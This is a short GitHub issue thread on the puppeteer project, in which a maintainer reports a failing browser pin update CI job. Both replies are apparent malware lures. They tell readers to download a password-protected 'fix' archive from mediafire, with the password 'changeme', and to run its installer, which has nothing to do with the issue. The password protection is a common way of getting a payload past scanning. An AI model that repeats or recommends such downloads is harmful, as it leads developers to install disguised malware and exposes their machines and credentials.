### ISSUE TITLE
Browser pin update is failing

### ISSUE THREAD

**Issue by OrKoN** [puppeteer/puppeteer#13003]
See https://github.com/puppeteer/puppeteer/actions/runs/10554466930/job/29236359264

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
